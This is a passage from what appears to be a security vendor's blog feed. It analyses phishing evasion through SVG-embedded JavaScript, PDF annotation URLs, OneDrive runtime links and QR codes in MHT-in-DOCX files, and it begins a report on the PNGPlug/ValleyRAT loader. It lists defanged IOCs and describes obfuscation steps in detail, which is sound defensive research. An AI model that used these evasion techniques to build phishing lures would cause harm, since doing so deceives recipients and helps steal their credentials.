&lt;a href="#1-script-in-the-shadows-base64-javascript-lurking-in-svg-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Attackers continue to abuse SVG files by embedding Base64-encoded JavaScript
inside them. Once decoded, this JavaScript reveals an obfuscated script that
redirects users to a phishing site. The attackers delivered the SVG file as an
email attachment, successfully evading detection mechanisms.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;How SVG Files Work&lt;span class="hx:absolute hx:-mt-20" id="how-svg-files-work"&gt;&lt;/span&gt;
&lt;a href="#how-svg-files-work" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Scalable Vector Graphics (SVG) is an XML-based format for rendering
two-dimensional graphics. Unlike other image formats, SVG files can contain
scripts, hyperlinks, and interactive elements, making them a potential attack
vector. Attackers abuse this flexibility by embedding JavaScript inside
&lt;code&gt;&amp;lt;foreignObject&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;iframe&amp;gt;&lt;/code&gt; tags, often using Base64 encoding to conceal
malicious scripts.&lt;/p&gt;
&lt;h3&gt;What is Encoding?&lt;span class="hx:absolute hx:-mt-20" id="what-is-encoding"&gt;&lt;/span&gt;
&lt;a href="#what-is-encoding" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Encoding is the process of transforming data into a different format, typically
for safe transmission or storage. In phishing campaigns, threat actors use
encoding (such as Base64 or hexadecimal) to disguise the true intent of
malicious scripts.&lt;/p&gt;
&lt;p&gt;By encoding the payload, the script avoids detection by security scanners that
rely on static signatures or pattern matching. To analyze these files properly,
we must first decode the data to reveal its original structure.&lt;/p&gt;
&lt;h3&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis"&gt;&lt;/span&gt;
&lt;a href="#analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;IOC: &lt;code&gt;b5a7406d5b4ef47a62b8dd1e4bec7f1812162433955e3a5b750cc471cbfad93e&lt;/code&gt;
(&lt;a href="https://www.virustotal.com/gui/file/de0b9021204beb8cb3acc2e339b16a64bfe8084447d1cdca28dc5bdb2203e139/detection"target="_blank" rel="noopener"&gt;VirusTotal link&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Upon inspecting the SVG file, we found an embedded &lt;code&gt;&amp;lt;iframe&amp;gt;&lt;/code&gt; tag containing
Base64-encoded data.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Decoding the Base64 data exposed an obfuscated JavaScript payload.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;This script, when deobfuscated, revealed a malicious URL that redirected users
to a phishing page designed to harvest credentials.&lt;/p&gt;
&lt;p&gt;The script we extracted followed a multi-step obfuscation pattern:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reversal of the string: The encoded string is reversed to make static
detection harder.&lt;/li&gt;
&lt;li&gt;Junk character removal: Specific characters (like x, q, z, etc.) are inserted
randomly to confuse regular expression-based scanners. These are removed
programmatically before decoding.&lt;/li&gt;
&lt;li&gt;Hexadecimal to ASCII conversion: The payload is split by delimiters (e.g.,
-), and each segment is converted from hex, then transformed to ASCII through
a mathematical formula.&lt;/li&gt;
&lt;li&gt;Final URL reconstruction: Once decoded, the script builds a phishing URL and
assigns it to &lt;code&gt;window.location.href&lt;/code&gt;, redirecting the victim to a
credential-harvesting page.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This multi-layered obfuscation allowed the payload to bypass most static
analysis engines.&lt;/p&gt;
&lt;p&gt;For this analysis, the Intezer research team developed a custom tool to analyze
this technique in SVG files.&lt;/p&gt;
&lt;h3&gt;Findings&lt;span class="hx:absolute hx:-mt-20" id="findings"&gt;&lt;/span&gt;
&lt;a href="#findings" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When using the tool, we found that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The attacker leveraged an SVG file to embed a hidden payload.&lt;/li&gt;
&lt;li&gt;The JavaScript within the Base64-encoded data was obfuscated to avoid static
detection.&lt;/li&gt;
&lt;li&gt;VirusTotal initially marked the SVG file as trusted with zero detections.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This technique highlights the effectiveness of unconventional file formats in
phishing attacks. SVG files are commonly used for legitimate purposes, making
them an ideal candidate for evading security filters. Additionally, many
security solutions do not deeply inspect SVG files for embedded JavaScript,
allowing these attacks to slip through undetected.&lt;/p&gt;
&lt;h2&gt;2. Annotated with Bad Intent: Malicious URLs in PDFs&lt;span class="hx:absolute hx:-mt-20" id="2-annotated-with-bad-intent-malicious-urls-in-pdfs"&gt;&lt;/span&gt;
&lt;a href="#2-annotated-with-bad-intent-malicious-urls-in-pdfs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Attackers are leveraging PDF files as a covert phishing delivery mechanism by
embedding malicious URLs inside PDF annotations. Unlike traditional phishing
attacks, where links are visible within the document, these links are hidden in
metadata, allowing them to bypass email security tools and remain undetected by
most scanning solutions. The phishing emails delivering these PDFs successfully
passed through multiple email security filters, reaching users’ inboxes without
any warnings.&lt;/p&gt;
&lt;h3&gt;How the PDF Format Works&lt;span class="hx:absolute hx:-mt-20" id="how-the-pdf-format-works"&gt;&lt;/span&gt;
&lt;a href="#how-the-pdf-format-works" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The PDF format is built on a [structured and modular
architecture],(&lt;a href="https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/"target="_blank" rel="noopener"&gt;https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/&lt;/a&gt;)
making it flexible for both rendering content and embedding interactive
features. Each PDF file consists of a collection of objects, including text,
images, fonts, scripts, annotations, and more organized in a hierarchical
structure.&lt;/p&gt;
&lt;p&gt;These objects are referenced through an internal table known as the
cross-reference table, which helps PDF readers locate and render content
efficiently. Not everything in a PDF is visible on the page; much of the
content, such as form fields, metadata, or actions triggered by user
interaction, resides in non-rendered object streams.&lt;/p&gt;
&lt;p&gt;Because of this complexity, attackers can hide malicious content inside
less-inspected parts of the file, especially in elements that are not rendered
visually or immediately accessible by the document viewer.&lt;/p&gt;
&lt;h3&gt;What Are PDF Annotations?&lt;span class="hx:absolute hx:-mt-20" id="what-are-pdf-annotations"&gt;&lt;/span&gt;
&lt;a href="#what-are-pdf-annotations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Attackers commonly abuse PDF annotations. These are structured elements
typically used to define interactive elements such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hyperlinks&lt;/li&gt;
&lt;li&gt;Comments and notes&lt;/li&gt;
&lt;li&gt;Embedded multimedia&lt;/li&gt;
&lt;li&gt;Buttons or form actions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Annotations are stored within specific objects, often referenced via the
&lt;code&gt;/Annots&lt;/code&gt; array. Each annotation object can include an &lt;code&gt;/A&lt;/code&gt; (action) dictionary
with a &lt;code&gt;/URI&lt;/code&gt; value pointing to an external website. Here’s a simplified
example:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-postscript" data-lang="postscript"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;&amp;lt;&amp;lt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nv"&gt;/Type&lt;/span&gt; &lt;span class="nv"&gt;/Annot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nv"&gt;/Subtype&lt;/span&gt; &lt;span class="nv"&gt;/Link&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nv"&gt;/A&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&amp;lt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nv"&gt;/S&lt;/span&gt; &lt;span class="nv"&gt;/URI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nv"&gt;/URI&lt;/span&gt; &lt;span class="s"&gt;(http://malicious-site.com)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;&amp;gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Because this data is stored in the metadata layer and not the visible text
content, scanners and email security solutions that rely on surface-level or
optical text parsing frequently miss it.&lt;/p&gt;
&lt;p&gt;For a deeper technical dive into how to inspect these structures and extract
hidden links, see our blog:
&lt;a href="https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/"target="_blank" rel="noopener"&gt;How to Analyze Malicious PDF Files&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Many security scanners and link extraction tools rely on traditional parsing
methods that target visible content or standard URL placements. Embedding a URL
inside a metadata field, such as an annotation, disrupts this process. This
evasion technique isn’t about hiding from the human eye; it’s about bypassing
automated tools not designed to extract URLs from non-standard locations in a
PDF.&lt;/p&gt;
&lt;h3&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-1"&gt;&lt;/span&gt;
&lt;a href="#analysis-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;IOC: 252422de154885806f491d602af3bb2eda10563308c65fa5ba8272a9b59f7f41
(VirusTotal)&lt;/p&gt;
&lt;p&gt;Upon analyzing the malicious PDF file, we discovered that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The phishing URL was stored inside an annotation object within the /Annots
array.&lt;/li&gt;
&lt;li&gt;The URL was not present in the readable text layer of the PDF, making it
invisible to users unless they inspected the metadata.&lt;/li&gt;
&lt;li&gt;The file successfully bypassed multiple email security gateways, allowing it
to be delivered directly to users.&lt;/li&gt;
&lt;li&gt;VirusTotal’s initial scan returned zero detections for 15 days, meaning no
security vendor flagged it as malicious, and the malicious PDF bypassed
security vendors and went straight to the victim’s mailbox.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;To extract the hidden URL, we performed the following steps using a custom PDF
URL analyzer built by the Intezer research team:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Parsed the PDF structure: We examined the internal objects and metadata to
identify the /Annots array.&lt;/li&gt;
&lt;li&gt;Extracted annotation contents: We located any /URI fields inside annotation
objects that contained hyperlinks.&lt;/li&gt;
&lt;li&gt;Decoded the phishing URL: The extracted URL was checked against known
malicious indicators and phishing databases using a custom tool we built and
Intezer’s platform.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;Findings&lt;span class="hx:absolute hx:-mt-20" id="findings-1"&gt;&lt;/span&gt;
&lt;a href="#findings-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In the analysis we conducted, we found that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The attacker embedded a phishing URL inside a hidden annotation field, making
it invisible to common link extraction mechanisms.&lt;/li&gt;
&lt;li&gt;The file was uploaded to VirusTotal, and at the time of analysis, &lt;strong&gt;none of
the security vendors flagged it as malicious&lt;/strong&gt;, allowing the malicious PDF to
reach user inboxes undetected.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This technique shows how attackers exploit the flexibility of PDF structure to
hide phishing payloads in unexpected places. By embedding URLs in metadata
fields like annotations, adversaries can bypass traditional detection
mechanisms that aren’t built to interpret the full object graph of a PDF.&lt;/p&gt;
&lt;p&gt;Because the link is neither visible nor clickable in the traditional sense, it
evades superficial scanning yet remains functional when opened to certain
viewers. This highlights the importance of deeper inspection of file structures
and improved context-aware parsing in email and document security tools.&lt;/p&gt;
&lt;h2&gt;3. When Sharing Turns Sinister: Malicious URLs in OneDrive Links&lt;span class="hx:absolute hx:-mt-20" id="3-when-sharing-turns-sinister-malicious-urls-in-onedrive-links"&gt;&lt;/span&gt;
&lt;a href="#3-when-sharing-turns-sinister-malicious-urls-in-onedrive-links" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;OneDrive is a widely used file-sharing service that allows users to store and
share documents online. Threat actors leverage OneDrive’s trusted reputation to
host phishing content, making detection more challenging. Instead of directly
sending a phishing URL, attackers share a read-only OneDrive link that appears
benign but contains an embedded malicious URL that executes dynamically within
JavaScript when loaded.&lt;/p&gt;
&lt;h3&gt;Why This Attack is Difficult to Detect&lt;span class="hx:absolute hx:-mt-20" id="why-this-attack-is-difficult-to-detect"&gt;&lt;/span&gt;
&lt;a href="#why-this-attack-is-difficult-to-detect" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This attack is challenging to detect due to how OneDrive renders shared
documents:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Read-only restriction: When accessing a shared OneDrive file, the document is
in read-only mode, preventing users from easily extracting or modifying its
contents.&lt;/li&gt;
&lt;li&gt;Dynamic execution: The malicious URL is not statically present in the
document’s body or metadata but is instead dynamically loaded through
JavaScript at runtime.&lt;/li&gt;
&lt;li&gt;Failure of static analysis: Many security scanners and email security tools
rely on static link extraction methods. Traditional scanners fail to identify
the threat since the phishing URL does not exist in the initial DOM
structure.&lt;/li&gt;
&lt;li&gt;Bypassing email security filters: The email containing the OneDrive link
passed through multiple email security solutions undetected, making it
directly accessible to users.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-2"&gt;&lt;/span&gt;
&lt;a href="#analysis-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;IOCs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;https://1drv[.]ms/o/c/1ba8fd2bd98c98a8/EqF44YiGOwBIpBplYeDLr_8BcMUtVTMm6dwmUK9E0dXA_A?e=ZrI61x&lt;/code&gt;
(&lt;a href="https://www.virustotal.com/gui/url/04e39e4c023e96739a0e1e9c4fe1aa60ce1c75de1947467e9acfa3bbe126135e/detection"target="_blank" rel="noopener"&gt;VirusTotal&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://login.rocklongdays[.]shop/NXayublq&lt;/code&gt;
(&lt;a href="https://www.virustotal.com/gui/url/6532f8eaeda4b1e1d9c4bc80d9b57fc138c3c297b7f519be7f6e8d0a3d2fa9ad"target="_blank" rel="noopener"&gt;VirusTotal&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To investigate this technique, we attempted various standard approaches:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Direct static extraction: Parsing the OneDrive document’s HTML and inspecting
its DOM elements yielded no phishing URLs.&lt;/li&gt;
&lt;li&gt;Network traffic inspection: Capturing the network requests while loading the
document showed delayed URL loading, indicating dynamic content injection.&lt;/li&gt;
&lt;li&gt;Manual analysis in browser dev tools: The URL was only visible within
developer tools after JavaScript execution.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Findings&lt;span class="hx:absolute hx:-mt-20" id="findings-2"&gt;&lt;/span&gt;
&lt;a href="#findings-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;After conducting the analysis, we concluded that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The phishing URL was dynamically inserted via JavaScript and was not present
in the initial document structure.&lt;/li&gt;
&lt;li&gt;Static analysis methods, including traditional email security scanners,
failed to detect the malicious URL.&lt;/li&gt;
&lt;li&gt;VirusTotal initially marked the OneDrive-hosted document as clean, further
proving that standard detection techniques are insufficient.&lt;/li&gt;
&lt;li&gt;The technique required a multi-step forensic approach. Saving the OneDrive
document as a PDF exposed the hidden phishing URL within the metadata.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This attack highlights how attackers abuse trusted cloud-based platforms to
evade security controls. Since many organizations allow OneDrive links in
corporate environments, phishing actors exploit this trust to deliver
credential-harvesting campaigns. The fact that email security tools failed to
detect this attack further emphasizes the need for advanced inspection
mechanisms.&lt;/p&gt;
&lt;p&gt;By leveraging read-only document sharing and dynamic execution, threat actors
increase their chances of success while reducing the likelihood of detection
through traditional security measures.&lt;/p&gt;
&lt;h2&gt;4. Buried Deep: MHT Files Nesting in OpenXML Documents&lt;span class="hx:absolute hx:-mt-20" id="4-buried-deep-mht-files-nesting-in-openxml-documents"&gt;&lt;/span&gt;
&lt;a href="#4-buried-deep-mht-files-nesting-in-openxml-documents" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Phishers increasingly use &lt;em&gt;MHT&lt;/em&gt; (MIME HTML) files embedded within OpenXML
documents (e.g., &lt;code&gt;.docx&lt;/code&gt;) to deliver phishing payloads. MHT files are used to
archive web content and can store complete HTML documents, including images,
links, and scripts. This makes them ideal for hiding phishing lures inside
seemingly harmless Office files.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/images/fig8.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The phishing emails delivering these &lt;code&gt;.docx&lt;/code&gt; files successfully bypassed
multiple email security filters and landed in user inboxes undetected.&lt;/p&gt;
&lt;h3&gt;How OpenXML Documents Work&lt;span class="hx:absolute hx:-mt-20" id="how-openxml-documents-work"&gt;&lt;/span&gt;
&lt;a href="#how-openxml-documents-work" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Modern Microsoft Office documents are based on the OpenXML standard, which
structures the document’s content in a ZIP-based format containing multiple
files and directories (e.g., &lt;code&gt;word/document.xml&lt;/code&gt;, &lt;code&gt;media/&lt;/code&gt;, &lt;code&gt;embeddings/&lt;/code&gt;).
Threat actors abuse this format by embedding MHT files inside the document,
making it possible to deliver archived web lures that won’t be rendered or
scanned unless explicitly unpacked and inspected.&lt;/p&gt;
&lt;h3&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-3"&gt;&lt;/span&gt;
&lt;a href="#analysis-3" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;IOCs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;07565bc74159ddbebb8dadbd6f20871f4236883653dc7fdd1d30ecd0460167e5&lt;/code&gt;
(&lt;a href="https://www.virustotal.com/gui/file/07565bc74159ddbebb8dadbd6f20871f4236883653dc7fdd1d30ecd0460167e5"target="_blank" rel="noopener"&gt;VirusTotal&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://elitesglassandmetal[.]com/NXttfWmEqWJrJQ&lt;/code&gt;
(&lt;a href="https://www.virustotal.com/gui/url/b4a8ce87815416df014b1d692f60a5cbc13692009f82ab59a14c29e5e902d4a0"target="_blank" rel="noopener"&gt;VirusTotal&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A malicious .docx sample contained an embedded MHT file delivering a
sophisticated QR-based phishing attack (also known as quishing). The attack
used multiple layers of deception:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malicious QR Code: The MHT file embedded two images: image0.png and
image1.png. The second image contained a QR code which, when decoded,
resolved to:&lt;/li&gt;
&lt;li&gt;https://elitesglassandmetal[.]com/NXttfWmEqWJrJQ&lt;/li&gt;
&lt;li&gt;The domain appears legitimate but is likely compromised and hosting a
phishing page.&lt;/li&gt;
&lt;li&gt;Brand Impersonation: The phishing content impersonated both Microsoft
Office365 and ROLEX, including brand imagery and a 2025 copyright notice.&lt;/li&gt;
&lt;li&gt;Social Engineering &amp;amp; Urgency: Language in the MHT warned that the recipient’s
account would be “suspended from sending and receiving messages” within 24
hours, pressuring users into action. Words and phrases such as “2FA,”
“message encryption,” and “authentication” were used to imply a legitimate
security notification.&lt;/li&gt;
&lt;li&gt;Quishing Evasion Technique: By embedding the phishing URL within a QR code
image rather than plain text or hyperlinks, the attacker successfully
bypassed traditional email scanners and static link analysis tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We’ve conducted this analysis using a custom tool we developed. It extracts all
the MHT files inside and decodes the QR code. The image below shows the output:&lt;/p&gt;
&lt;h3&gt;Findings&lt;span class="hx:absolute hx:-mt-20" id="findings-3"&gt;&lt;/span&gt;
&lt;a href="#findings-3" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;After using the tool we developed to conduct our analysis, we found that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The phishing URL was embedded as a QR code within an image inside an MHT
file, buried deep within the &lt;code&gt;.docx&lt;/code&gt; structure.&lt;/li&gt;
&lt;li&gt;Static scanners and email security solutions did not extract or analyze the
MHT file, allowing the payload to slip through.&lt;/li&gt;
&lt;li&gt;The phishing campaign used common social engineering tactics, including
urgency, impersonation, and trusted branding.&lt;/li&gt;
&lt;li&gt;VirusTotal showed zero detections for this sample at the time of analysis,
indicating a widespread blind spot across vendors.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This case highlights the growing abuse of document structure to conceal
phishing payloads. The combination of MHT embedding, QR code redirection, and
brand impersonation makes this technique difficult to detect using traditional
rule-based systems.&lt;/p&gt;
&lt;p&gt;Organizations should consider implementing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deep inspection of OpenXML document internals&lt;/li&gt;
&lt;li&gt;QR code analysis pipelines for document attachments&lt;/li&gt;
&lt;li&gt;Behavioral analysis to catch malicious redirection patterns that static tools
overlook&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As threat actors continue to innovate around delivery methods, defenders must
match that sophistication with context-aware analysis and layered defenses.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The techniques uncovered in this research underscore a clear evolution in
phishing tactics that leverage non-traditional file formats, cloud-hosted trust
abuse, and structural evasion to bypass modern defenses. These are not random,
opportunistic tricks; they are calculated methods designed to defeat static
analysis, signature-based detection, and even behavioral filtering at the email
gateway and endpoint level.&lt;/p&gt;
&lt;p&gt;We’ve observed phishing payloads hidden in places most tools don’t look:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Encoded JavaScript in SVG images, bypassing visual and content-based
scanning.&lt;/li&gt;
&lt;li&gt;Hyperlinks embedded in PDF annotation objects, never visible in the main text
layer.&lt;/li&gt;
&lt;li&gt;Dynamic phishing URLs are rendered at runtime inside OneDrive-hosted files,
invisible to static crawlers.&lt;/li&gt;
&lt;li&gt;Archived MHT payloads are hidden deep inside OpenXML structures, escaping
inspection in document-level scanning.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A shift toward structural and contextual obfuscation ties all of these
techniques together, where the malicious content only becomes apparent when
rendered, executed, or deeply unpacked. And in every case we documented, the
payloads successfully bypassed email security solutions, reaching end users in
real-world attacks. In multiple samples, no vendors on VirusTotal flagged the
files as malicious at the time of analysis.&lt;/p&gt;
&lt;p&gt;As phishing continues to evolve, defenders must adapt. Traditional rules-based
detection and regex-driven link scanning are no longer enough. Analysts and
security researchers need to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perform deep, format-aware inspection of complex file types like SVG, PDF,
DOCX, and MHT.&lt;/li&gt;
&lt;li&gt;Combine static and dynamic analysis, especially for cloud-based or
runtime-resolved payloads.&lt;/li&gt;
&lt;li&gt;Stay informed of obfuscation patterns and structural abuses that go beyond
signature detection.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At Intezer, our visibility into millions of alerts enables us to identify and
track these shifts in real time. We encourage the community to remain
proactive. These are not theoretical techniques; they are actively used in the
wild, and we expect their adoption to increase.&lt;/p&gt;
&lt;p&gt;Phishing isn’t going away, but with the right tools, analysis depth, and
research collaboration, we can stay ahead of threats designed to go unnoticed.&lt;/p&gt;</description></item><item><title>Weaponized Software Targets Chinese</title><link>https://research.intezer.com/blog/2025/01/weaponized-software-targets-chinese/</link><pubDate>Thu, 16 Jan 2025 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2025/01/weaponized-software-targets-chinese/</guid><description>
&lt;h2&gt;Overview of the Attack&lt;span class="hx:absolute hx:-mt-20" id="overview-of-the-attack"&gt;&lt;/span&gt;
&lt;a href="#overview-of-the-attack" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Intezer Labs research team has identified a series of attacks targeting
organizations in Chinese-speaking regions like Hong Kong, Taiwan, and China
itself. These attacks utilize a multi-stage loader, which we named PNGPlug, to
deliver the ValleyRAT payload.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://bbs.kanxue.com/thread-284691.htm"target="_blank" rel="noopener"&gt;A similar attack chain is documented in this report&lt;/a&gt;,
which sheds light on the infection vector and the method of delivering the
malicious files.&lt;/p&gt;
&lt;p&gt;According to the report, the attack begins with a phishing webpage designed to
encourage victims to download a malicious MSI (Microsoft Installer) package
disguised as legitimate software.&lt;/p&gt;
&lt;p&gt;Upon execution, the installer performs two critical tasks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deploying a benign application to maintain the illusion of legitimacy.&lt;/li&gt;
&lt;li&gt;Extracting an encrypted archive containing the malware payload.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The MSI package uses the Windows Installer’s CustomAction feature, enabling it
to execute malicious code, including running an embedded malicious DLL that
decrypts the archive (all.zip) using a hardcoded password hello202411 to
extract the core malware components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;libcef.dll: The loader, designed with padding to inflate its size to 220MB,
helps it evade detection as many security tools skip analyzing large files.
(&lt;a href="../../../2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/"&gt;For more information about how this technique is used in loaders, check out our recent blog post.&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;down.exe: A legitimate application used to mask malicious activities.&lt;/li&gt;
&lt;li&gt;aut.png and view.png: Files masquerading as PNG images containing encoded
malicious payloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Role of the PNGPlug Loader&lt;span class="hx:absolute hx:-mt-20" id="role-of-the-pngplug-loader"&gt;&lt;/span&gt;
